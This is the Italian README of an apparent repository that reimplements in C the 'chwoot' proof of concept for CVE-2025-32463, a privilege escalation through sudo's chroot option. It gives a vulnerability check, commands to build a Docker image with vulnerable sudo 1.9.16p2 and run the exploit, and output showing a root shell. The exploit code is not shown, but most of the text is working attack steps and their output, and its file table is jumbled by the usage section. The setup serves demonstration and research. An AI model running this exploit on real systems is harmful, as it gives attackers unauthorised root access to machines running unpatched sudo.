
Reimplementazione in C del PoC chwoot
Questo repository fornisce un ambiente minimale e riproducibile per dimostrare la vulnerabilità di escalation dei privilegi CVE‑2025‑32463 nella funzionalità chroot di sudo.
Le build vulnerabili di sudo 1.9.14 fino a 1.9.17 (tutte le p‑revisioni) sulla maggior parte delle distribuzioni Linux sono interessate.
Pagine di Sicurezza
| File | Scopo |
|---|---|
| Dockerfile | Crea un'immagine Ubuntu 24.04 con sudo 1.9.16p2 vulnerabile e strumenti di build |
| sudo‑chwoot.sh | Exploit proof‑of‑concept che avvia una shell root all'interno del chroot |
| run.sh |
# sudo vulnerabile
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# sudo corretto
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot
# 1 – clona il repo
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463
# 2 – build e avvia l'immagine Docker (taggata "vpr-chwoot")
$ ./run.sh
# 3 – esegui l'exploit nel container (esegue il comando root direttamente)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#
run.sh passa --privileged e --rm a Docker in modo che il container si pulisca da solo quando esci.
Rimuovi l'immagine quando hai finito:
docker rmi vpr-chwoot
| Script helper che crea l'immagine (se necessario) e avvia il container dell'exploit |